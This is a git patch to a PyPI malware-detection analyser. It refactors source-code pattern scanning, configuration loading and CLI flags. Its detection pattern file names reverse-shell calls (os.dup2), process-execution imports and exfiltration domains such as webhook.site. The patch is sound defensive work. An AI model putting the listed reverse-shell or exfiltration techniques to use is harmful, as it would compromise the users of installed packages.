From dffd91160eff1aa354d6bc446b8383b0da15814a Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Fri, 17 Jan 2025 15:18:25 +1000 Subject: [PATCH 01/37] refactor: refactoring existing source code analysis functionality chore: Merging staging changes with sourcecode analysis. --- src/macaron/__main__.py | 9 +- src/macaron/config/defaults.ini | 4 + .../pypi_heuristics/heuristics.py | 3 + .../pypi_sourcecode_analyzer.py | 444 ++++++++++++------ .../suspicious_patterns.yaml} | 6 +- src/macaron/slsa_analyzer/analyze_context.py | 6 +- src/macaron/slsa_analyzer/analyzer.py | 16 +- .../checks/detect_malicious_metadata_check.py | 58 ++- .../package_registry/pypi_registry.py | 122 ++--- src/macaron/util.py | 8 +- 10 files changed, 414 insertions(+), 262 deletions(-) rename src/macaron/malware_analyzer/pypi_heuristics/{ => sourcecode}/pypi_sourcecode_analyzer.py (58%) rename src/macaron/malware_analyzer/pypi_heuristics/{suspicious_pattern.yaml => sourcecode/suspicious_patterns.yaml} (95%) diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index 03549db7f..2833b32af 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -172,8 +172,8 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None analyzer_single_args.sbom_path, deps_depth, provenance_payload=prov_payload, - validate_malware=analyzer_single_args.validate_malware, verify_provenance=analyzer_single_args.verify_provenance, + analyze_source=analyzer_single_args.analyze_source, ) sys.exit(status_code) @@ -477,10 +477,13 @@ def main(argv: list[str] | None = None) -> None: ) single_analyze_parser.add_argument( - "--validate-malware", + "--analyze-source", required=False, action="store_true", - help=("Enable malware validation."), + help=( + "EXPERIMENTAL. For improved malware detection, analyze the source code of the" + + " (PyPI) package using a textual scan and dataflow analysis." 
+ ), ) single_analyze_parser.add_argument( diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index c46e09ce1..99be0b7bd 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -600,3 +600,7 @@ major_threshold = 20 epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 + +# yaml configuration file containing suspicious patterns. Can be full path or relative to +# folder where macaron is installed +suspicious_patterns_file = src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index bd829a0f1..8447a9961 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -37,6 +37,9 @@ class Heuristics(str, Enum): #: Indicates that the package has an unusually large version number for a single release. ANOMALOUS_VERSION = "anomalous_version" + #: Indicates that the package source code contains suspicious code patterns. + SUSPICIOUS_PATTERNS = "suspicious_patterns" + class HeuristicResult(str, Enum): """Result type indicating the outcome of a heuristic.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py similarity index 58% rename from src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py rename to src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index edf7a1830..a616c8e57 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. 
+# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """ @@ -13,184 +13,253 @@ import ipaddress import logging import os -import pathlib import re +from dataclasses import dataclass import yaml +from macaron.config.defaults import defaults +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.json_tools import JsonType +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset logger: logging.Logger = logging.getLogger(__name__) +IMPORTS = "imports" +CONSTANTS = "constants" +CALLS = "calls" -class DataFlowTracer(ast.NodeVisitor): - """The class is used to create the symbol table and analyze the dataflow.""" - def __init__(self) -> None: - self.symbol_table: dict = {} # Store variable assignments - self.trace_path: list = [] +@dataclass(frozen=True) +class Import: + """Data class to hold information about extracted import statements. - def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Assign node and build the symbol table.""" - for target in node.targets: - if isinstance(target, ast.Name): - target_name = target.id - if isinstance(node.value, ast.Name): - self.symbol_table[target_name] = str(node.value.id) - elif isinstance(node.value, ast.Constant): - self.symbol_table[target_name] = str(node.value.value) - # Handle other assignment types as needed (e.g., function calls, lists) - else: - self.symbol_table[target_name] = ast.unparse(node.value) - self.generic_visit(node) # Important for visiting nested assign + Name, alias, and module are referring to the following patterns of python import statements: + - [from ] import [as ] + """ - def trace_back(self, variable_name: str) -> list: - """Get the full path of the dataflow. 
+ name: str + alias: str | None + module: str | None + lineno: int + statement: str - Parameters - ---------- - variable_name: str - The argument of the function call. + +class PyPISourcecodeAnalyzer: + """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. + + This analyzer works in two phases. In the first phase, it will perform a pattern-based scan of all python files + in the source code, looking for suspicious patterns defined by the YAML file in defaults.ini. By default, this + will include suspicious package imports, suspicious hardcoded constants, and suspicious function calls. If this + scan does not find any suspicious activity, the analysis will stop and the package will be marked as benign + by this analyzer. If the scan does find suspicious activity, the analyzer will move on to the second phase. + + In the second phase, the analyzer will perform dataflow analysis. This will track the flow of suspicious constants + and the results of suspicious function calls to where they are used, to determine if they are used in a malicious + manner. Suspicious activity includes data exfiltration, code execution, remote connections, operating system and + process manipulation, and encoded and obfuscated patterns. The types of activity, and their severity and quantity, + will then determine the probability of the package being malicious. + + Currently, this analyzer only supports the first phase, and will return simply boolean results on the maliciousness + of the package. + """ + + EXPECTED_PATTERN_CATEGORIES = [IMPORTS, CONSTANTS, CALLS] + + def __init__(self) -> None: + """Collect required data for analysing the source code.""" + self.suspicious_patterns = self._load_defaults() + + def _load_defaults(self) -> dict[str, dict[str, list]]: + """Load the suspicious pattern from suspicious_pattern.yaml. Returns ------- - list - The path of the dataflow. 
- """ - self.trace_path = [] - self._recursive_trace(variable_name) - return self.trace_path - - def _recursive_trace(self, variable_name: str) -> None: - """Recursively build the dataflow path by analyzing the symbol table. + dict[str: dict[str, list]] + The suspicious pattern. - Parameters - ---------- - variable_name: str - The argument of the function call. + Raises + ------ + ConfigurationError + if the suspicious pattern file is not in the expected format or cannot be accessed. """ - if variable_name in self.symbol_table: - value = self.symbol_table[variable_name] - if not self.trace_path: - self.trace_path.extend([variable_name, value]) + suspicious_patterns: dict[str, dict[str, list]] = {} + section_name = "heuristic.pypi" + + if defaults.has_section(section_name): + section = defaults[section_name] + else: + error_msg = f"Unable to find section {section_name}, which is required to load suspicious patterns." + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + configuration_name = "suspicious_patterns_file" + filename = section.get(configuration_name) + if filename is None: + error_msg = f"Unable to find {configuration_name} in configuration file." + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + filename = os.path.normpath(filename) + try: + with open(filename, encoding="utf-8") as file: + configured_patterns: dict[str, JsonType] = yaml.safe_load(file) + except FileNotFoundError as file_error: + error_msg = f"Unable to open locate {filename}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) from file_error + except yaml.YAMLError as yaml_error: + error_msg = f"Unable to parse {filename} as a yaml file." 
+ logger.debug(error_msg) + raise ConfigurationError(error_msg) from yaml_error + + for expected_category in self.EXPECTED_PATTERN_CATEGORIES: + if expected_category not in configured_patterns: + error_msg = ( + f"Expected suspicious pattern category {expected_category} present in" + + f" {filename}: must have categories {self.EXPECTED_PATTERN_CATEGORIES}" + ) + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + for category, patterns in configured_patterns.items(): + suspicious_patterns[category] = {} + if isinstance(patterns, list): + suspicious_patterns[category][category] = patterns + elif isinstance(patterns, dict): + for subcategory, subpatterns in patterns.items(): + if not isinstance(subpatterns, list): + error_msg = f"Expected subcategory {subcategory} items to be" + f" a list in {filename}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + suspicious_patterns[category][subcategory] = subpatterns else: - self.trace_path.append(value) - if ( - isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value - ): # only trace if it is a var name - self._recursive_trace(value) + error_msg = f"Expected category {category} to be either a list" + f" or dictionary in {filename}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) - def generate_symbol_table(self, source_code: str) -> None: - """Generate the symbol table. + return suspicious_patterns + + def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package for malicious patterns. + + This is the first phase of the source code analyzer. Parameters ---------- - source_code: str - The source code of the script. + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. 
+ + Raises + ------ + HeuristicAnalyzerValueError + if there is no source code available. """ - tree = ast.parse(source_code) - self.visit(tree) + analysis_result: dict = {} + result: HeuristicResult = HeuristicResult.PASS + source_code = pypi_package_json.package_sourcecode + if not source_code: + error_msg = "Unable to retrieve PyPI package source code" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) -class PyPISourcecodeAnalyzer: - """This class is used to analyze the source code.""" + for filename, content in source_code.items(): + detail_info = {} - def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None: - """Collect required data for analysing the source code.""" - self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode() - self.suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern() - # self.extracted_suspicious_content: dict[str, JsonType] = {} - self.analysis_result: dict = {} - self.is_malware: bool = False + try: + _ = ast.parse(content) + except (SyntaxError, ValueError) as ast_parse_error: + logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) + continue - def analyze(self) -> tuple[bool, dict]: - """Analyze the source code of the PyPI package. + imports = self._extract_imports(content) + import_names = set() + for i in imports: + if i.module: + import_names.add(".".join([i.module, i.name])) + import_names.add(i.name) - Returns - ------- - dict - The result of the analysis. 
- """ - if self.source_code and self.suspicious_pattern: - for filename, content in self.source_code.items(): - try: - imports = self._extract_imports_from_ast(content) - except SyntaxError: - imports = self._extract_imports_from_lines(content) - - if isinstance(self.suspicious_pattern["imports"], list): - suspicious_imports: set[str] | None = imports & set(self.suspicious_pattern["imports"]) - else: - suspicious_imports = None - - # No suspicious imports in the source code. Skip the further steps. - if not suspicious_imports: - logger.debug("No suspicious imports found in the file %s", filename) - continue - - # TODO: Currently the symbol table stores the data for dataflow analysis. - # In the future, the dataflow will be more complicated and even handle the cross-file dataflow. - tracer = DataFlowTracer() - tracer.generate_symbol_table(content) - logger.debug(tracer.symbol_table) - - # TODO: In the future, the probability policy to decide the file is malicious or not - # will be implemented. Therefore, the functioncall_analyzer.analyze() will return detail_info - # and analysis result. - functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - is_malware, detail_info = functioncall_analyzer.analyze(content) - if is_malware: - self.is_malware = is_malware - - # TODO: Currently, the result collector does not handle the situation that - # multiple same filename. In the future, this will be replace with absolute path. 
- if detail_info: - self.analysis_result[filename] = detail_info - - # TODO: Implement other suspicious setup in suspicious_pattern.yaml - # pattern = r"install_requires\s*=\s*\[(.*?)\]" - # matches: re.Match | None = re.search(pattern, content, re.DOTALL) - # if matches: - # install_requires: set[str] | None = set(re.findall(r"'(.*?)'", matches.group(1))) - # if ( - # install_requires - # and install_requires & set(self.suspicious_pattern["imports"]) - # and len(install_requires) < 4 - # # This threshold is based on historical malwares - # ): - # extracted_data["install_requires"] = install_requires - # TODO: In the future this result from each file will be used to calculate the probability. - # Then the is_malicious will be based on this value. - # Currently, the default policy is - return self.is_malware, self.analysis_result - - # def extract_susupicious_content(self) -> None: - # """Extract the suspicious content from the source code.""" - # if not self.source_code or not self.suspicious_pattern: - # return - # self.extracted_suspicious_content = self._extract_suspicious_content_from_source() - - def _load_suspicious_pattern(self) -> dict[str, JsonType] | None: - """Load the suspicious pattern from suspicious_pattern.yaml. + for category, patterns in self.suspicious_patterns[IMPORTS].items(): + category_info = [] + + suspicious_imports = set.intersection(import_names, set(patterns)) + if suspicious_imports: + category_info = [i for i in imports if i.name in suspicious_imports] + result = HeuristicResult.FAIL + + detail_info[category] = category_info + + analysis_result[filename] = {IMPORTS: detail_info} + + return result, analysis_result + + def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package for malicious dataflow. + + This is the second phase of the source code analyzer. Currently, this function is a placeholder for future + work. 
+ + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. Returns ------- - dict[str, JsonType] | None - The suspicious pattern. + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant dataflows identified. + + Raises + ------ + HeuristicAnalyzerValueError + if there is no source code available. """ - filename: str = "suspicious_pattern.yaml" - curr_dir: pathlib.Path = pathlib.Path(__file__).parent.absolute() - suspicious_pattern_file: str = os.path.join(curr_dir, filename) - with open(suspicious_pattern_file, encoding="utf-8") as file: + analysis_result: dict = {} + result: HeuristicResult = HeuristicResult.SKIP + + source_code = pypi_package_json.package_sourcecode + if not source_code: + error_msg = "Unable to retrieve PyPI package source code" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + for filename, content in source_code.items(): try: - suspicious_pattern: dict[str, JsonType] = yaml.safe_load(file) - except yaml.YAMLError as yaml_exception: - logger.debug("Error parsing the yaml file: '%s'", yaml_exception) - return None - return suspicious_pattern + _ = ast.parse(content) + except (SyntaxError, ValueError) as ast_parse_error: + logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) + continue - def _extract_imports_from_ast(self, content: str) -> set[str]: + # tracer = DataFlowTracer() + # tracer.generate_symbol_table(content) + + # functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) + # is_malware, detail_info = functioncall_analyzer.analyze(content) + # if is_malware: + # result = HeuristicResult.FAIL + + # # TODO: Currently, the result collector does not handle the situation that + # # multiple same filename. In the future, this will be replace with absolute path. 
+ # if detail_info: + # analysis_result[filename] = detail_info + + return result, analysis_result + + def _extract_imports(self, content: str) -> set[Import]: + try: + return self._extract_imports_from_ast(content) + except SyntaxError: + return self._extract_imports_from_lines(content) + + def _extract_imports_from_ast(self, content: str) -> set[Import]: """Extract imports from source code using the parsed AST. Parameters @@ -213,18 +282,16 @@ def _extract_imports_from_ast(self, content: str) -> set[str]: for node in ast.walk(tree): if isinstance(node, ast.Import): for alias in node.names: - imports.add(alias.name) + imports.add(Import(alias.name, alias.asname, None, alias.lineno, "")) elif isinstance(node, ast.ImportFrom): module = node.module if module: _module = "." * node.level + module - imports.add(_module) for name in node.names: - imports.add(_module + "." + name.name) - + imports.add(Import(name.name, name.asname, _module, name.lineno, "")) return imports - def _extract_imports_from_lines(self, content: str) -> set[str]: + def _extract_imports_from_lines(self, content: str) -> set[Import]: """Extract imports from source code using per line pattern matching. Parameters @@ -275,7 +342,7 @@ def _extract_imports_from_lines(self, content: str) -> set[str]: # 3 - from import statement module components. imports = set() - for line in content.splitlines(): + for lineno, line in enumerate(content.splitlines()): line.strip() match = re.match(combined_pattern, line) if not match: @@ -285,15 +352,13 @@ def _extract_imports_from_lines(self, content: str) -> set[str]: # Standard import, handle commas and aliases if present. 
splits = self._prune_aliased_lines(match.group(1), alias_pattern) for split in splits: - imports.add(split) + imports.add(Import(split, None, None, lineno, "")) elif match.group(2): # From import - imports.add(match.group(2)) if match.group(3): splits = self._prune_aliased_lines(match.group(3), alias_pattern) for split in splits: - imports.add(match.group(2) + "." + split) - + imports.add(Import(split, None, match.group(2), lineno, "")) return imports def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: @@ -306,6 +371,75 @@ def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: return results +class DataFlowTracer(ast.NodeVisitor): + """The class is used to create the symbol table and analyze the dataflow.""" + + def __init__(self) -> None: + self.symbol_table: dict = {} # Store variable assignments + self.trace_path: list = [] + + def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 + """Visit the Assign node and build the symbol table.""" + for target in node.targets: + if isinstance(target, ast.Name): + target_name = target.id + if isinstance(node.value, ast.Name): + self.symbol_table[target_name] = str(node.value.id) + elif isinstance(node.value, ast.Constant): + self.symbol_table[target_name] = str(node.value.value) + # Handle other assignment types as needed (e.g., function calls, lists) + else: + self.symbol_table[target_name] = ast.unparse(node.value) + self.generic_visit(node) # Important for visiting nested assign + + def trace_back(self, variable_name: str) -> list: + """Get the full path of the dataflow. + + Parameters + ---------- + variable_name: str + The argument of the function call. + + Returns + ------- + list + The path of the dataflow. + """ + self.trace_path = [] + self._recursive_trace(variable_name) + return self.trace_path + + def _recursive_trace(self, variable_name: str) -> None: + """Recursively build the dataflow path by analyzing the symbol table. 
+ + Parameters + ---------- + variable_name: str + The argument of the function call. + """ + if variable_name in self.symbol_table: + value = self.symbol_table[variable_name] + if not self.trace_path: + self.trace_path.extend([variable_name, value]) + else: + self.trace_path.append(value) + if ( + isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value + ): # only trace if it is a var name + self._recursive_trace(value) + + def generate_symbol_table(self, source_code: str) -> None: + """Generate the symbol table. + + Parameters + ---------- + source_code: str + The source code of the script. + """ + tree = ast.parse(source_code) + self.visit(tree) + + class FunctionCallAnalyzer(ast.NodeVisitor): """This class analyzes Python source code to identify potential suspicious behavior.""" @@ -348,8 +482,8 @@ def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disabl def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns["ast_calls"] - suspicious_const: dict = self.suspicious_patterns["ast_constant"] + suspicious_calls: dict = self.suspicious_patterns[CALLS] + suspicious_const: dict = self.suspicious_patterns[CONSTANTS] function_call: str = ast.unparse(node.func) args: str = " ".join([ast.unparse(arg) for arg in node.args]) expr: str = ast.unparse(node) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml similarity index 95% rename from src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml rename to src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml index 9c15144d4..3838e23a7 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml @@ -1,4 +1,4 
@@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. @@ -20,7 +20,7 @@ imports: - subprocess - Request -ast_calls: +calls: os_detection: - os.name code_execution: @@ -59,7 +59,7 @@ ast_calls: reverse_shell: - os.dup2 -ast_constant: +constants: domains: - webhook.site - discord diff --git a/src/macaron/slsa_analyzer/analyze_context.py b/src/macaron/slsa_analyzer/analyze_context.py index 84d8151f2..0f0804dc1 100644 --- a/src/macaron/slsa_analyzer/analyze_context.py +++ b/src/macaron/slsa_analyzer/analyze_context.py @@ -51,8 +51,8 @@ class ChecksOutputs(TypedDict): """The provenance and related information.""" local_artifact_paths: list[str] """The local artifact absolute paths.""" - validate_malware: bool - """True when the malware validation is enabled.""" + analyze_source: bool + """True when PyPI source code analysis has been enabled.""" class AnalyzeContext: @@ -106,7 +106,7 @@ def __init__( expectation=None, provenance_info=None, local_artifact_paths=[], - validate_malware=False, + analyze_source=False, ) @property diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index e3957e875..ed5dfe039 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -136,8 +136,8 @@ def run( sbom_path: str = "", deps_depth: int = 0, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, ) -> int: """Run the analysis and write results to the output path. @@ -154,10 +154,10 @@ def run( The depth of dependency resolution. Default: 0. provenance_payload : InToToPayload | None The provenance intoto payload for the main software component. - validate_malware: bool - Enable malware validation if True. 
verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. Returns ------- @@ -190,8 +190,8 @@ def run( main_config, analysis, provenance_payload=provenance_payload, - validate_malware=validate_malware, verify_provenance=verify_provenance, + analyze_source=analyze_source, ) if main_record.status != SCMStatus.AVAILABLE or not main_record.context: @@ -309,8 +309,8 @@ def run_single( analysis: Analysis, existing_records: dict[str, Record] | None = None, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, ) -> Record: """Run the checks for a single repository target. @@ -327,10 +327,10 @@ def run_single( The mapping of existing records that the analysis has run successfully. provenance_payload : InToToPayload | None The provenance intoto payload for the analyzed software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. Returns ------- @@ -541,7 +541,7 @@ def run_single( # TODO Add release tag, release digest. 
) - analyze_ctx.dynamic_data["validate_malware"] = validate_malware + analyze_ctx.dynamic_data["analyze_source"] = analyze_source if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index c69de3bde..9e1e8dd42 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -13,7 +13,7 @@ from macaron.database.db_custom_types import DBJsonDict from macaron.database.table_definitions import CheckFacts -from macaron.errors import HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics @@ -25,7 +25,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.source_code_repo import SourceCodeRepoAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer -from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.checks.base_check import BaseCheck @@ -100,26 +100,26 @@ def _should_skip( return True return False - def validate_malware(self, pypi_package_json: 
PyPIPackageJsonAsset) -> tuple[bool, dict[str, JsonType] | None]: - """Validate the package is malicious. + def analyze_source(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package with a textual scan, looking for malicious code patterns. Parameters ---------- pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. Returns ------- - tuple[bool, dict[str, JsonType] | None] - Returns True if the source code includes suspicious pattern. - Returns the result of the validation including the line number - and the suspicious arguments. - e.g. requests.get("http://malicious.com") - return the "http://malicious.com" + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. """ - # TODO: This redundant function might be removed - sourcecode_analyzer = PyPISourcecodeAnalyzer(pypi_package_json) - is_malware, detail_info = sourcecode_analyzer.analyze() - return is_malware, detail_info + logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) + try: + sourcecode_analyzer = PyPISourcecodeAnalyzer() + return sourcecode_analyzer.analyze_patterns(pypi_package_json) + except (ConfigurationError, HeuristicAnalyzerValueError) as source_code_error: + logger.debug("Unable to perform source code analysis: %s", source_code_error) + return HeuristicResult.SKIP, {} def evaluate_heuristic_results( self, heuristic_results: dict[Heuristics, HeuristicResult] @@ -279,6 +279,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, + package_sourcecode={} ) pypi_registry_info.metadata.append(pypi_package_json) @@ -286,28 +287,33 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # Download the PyPI package JSON, but no need to persist it to the filesystem. 
if pypi_package_json.package_json or pypi_package_json.download(dest=""): try: - result, detail_info = self.run_heuristics(pypi_package_json) + heuristic_results, heuristics_detail_info = self.run_heuristics(pypi_package_json) except HeuristicAnalyzerValueError: return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) - confidence, triggered_rules = self.evaluate_heuristic_results(result) - detail_info["triggered_rules"] = triggered_rules + confidence, triggered_rules = self.evaluate_heuristic_results(heuristic_results) + heuristics_detail_info["triggered_rules"] = triggered_rules result_type = CheckResultType.FAILED if not confidence: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - elif ctx.dynamic_data["validate_malware"]: - is_malware, validation_result = self.validate_malware(pypi_package_json) - if is_malware: # Find source code block matched the malicious pattern - confidence = Confidence.HIGH - elif validation_result: # Find suspicious source code, but cannot be confirmed - confidence = Confidence.MEDIUM - logger.debug(validation_result) + + # experimental analyze sourcecode feature + if ctx.dynamic_data["analyze_source"] and pypi_package_json.download_sourcecode(): + sourcecode_result, sourcecode_detail_info = self.analyze_source(pypi_package_json) + heuristic_results[Heuristics.SUSPICIOUS_PATTERNS] = sourcecode_result + heuristics_detail_info.update(sourcecode_detail_info) + + if sourcecode_result == HeuristicResult.FAIL: + if result_type == CheckResultType.PASSED: + # heuristics determined it benign, so lower the confidence + confidence = Confidence.LOW + result_type = CheckResultType.FAILED result_tables.append( MaliciousMetadataFacts( - result=result, - detail_information=detail_info, + result=heuristic_results, + detail_information=heuristics_detail_info, confidence=confidence, ) ) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py 
b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index b0b0275b5..04db1d2e2 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -159,77 +159,73 @@ def download_package_json(self, url: str) -> dict: return res_obj - def fetch_sourcecode(self, src_url: str) -> dict[str, str] | None: - """Get the source code of the package. + def download_package_sourcecode(self, url: str) -> dict: + """Download the package source code from pypi registry. + + Parameters + ---------- + url: str + The package source code url. Returns ------- - str | None - The source code. + dict[str: bytes] + A dictionary of filenames and file contents. """ + sourcecode: dict = {} + # Get name of file. - _, _, file_name = src_url.rpartition("/") + _, _, file_name = url.rpartition("/") - # Create a temporary directory to store the downloaded source. + # temporary directory to unzip and read all source files with tempfile.TemporaryDirectory() as temp_dir: - try: - response = requests.get(src_url, stream=True, timeout=40) - response.raise_for_status() - except requests.exceptions.HTTPError as http_err: - logger.debug("HTTP error occurred: %s", http_err) - return None - - if response.status_code != 200: - return None + response = send_get_http_raw(url, stream=True) + if response is None: + error_msg = f"Unable to find package source code using URL: {url}" + logger.debug(error_msg) + raise InvalidHTTPResponseError(error_msg) source_file = os.path.join(temp_dir, file_name) with open(source_file, "wb") as file: try: for chunk in response.iter_content(): file.write(chunk) - except RequestException as error: - # Something went wrong with the request, abort. 
- logger.debug("Error while streaming source file: %s", error) - response.close() - return None - logger.debug("Begin fetching the source code from PyPI") - py_files_content: dict[str, str] = {} + except RequestException as stream_error: + error_msg = f"Error while streaming source file: {stream_error}" + logger.debug(error_msg) + raise InvalidHTTPResponseError from RequestException + if tarfile.is_tarfile(source_file): try: - with tarfile.open(source_file, "r:gz") as tar: - for member in tar.getmembers(): - if member.isfile() and member.name.endswith(".py") and member.size > 0: - file_obj = tar.extractfile(member) - if file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[member.name] = content - except tarfile.ReadError as exception: - logger.debug("Error reading tar file: %s", exception) - return None + with tarfile.open(source_file, "r:gz") as sourcecode_tar: + for member in sourcecode_tar.getmembers(): + if member.isfile() and (file_obj := sourcecode_tar.extractfile(member)): + sourcecode[member.name] = file_obj.read() + + except tarfile.ReadError as read_error: + error_msg = f"Error reading source code tar file: {read_error}" + logger.debug(error_msg) + raise InvalidHTTPResponseError(error_msg) from read_error + elif zipfile.is_zipfile(source_file): try: - with zipfile.ZipFile(source_file, "r") as zip_ref: - for info in zip_ref.infolist(): - if info.filename.endswith(".py") and not info.is_dir() and info.file_size > 0: - with zip_ref.open(info) as file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[info.filename] = content - except zipfile.BadZipFile as bad_zip_exception: - logger.debug("Error reading zip file: %s", bad_zip_exception) - return None - except zipfile.LargeZipFile as large_zip_exception: - logger.debug("Zip file too large to read: %s", large_zip_exception) - return None - # except KeyError as zip_key_exception: - # logger.debug( 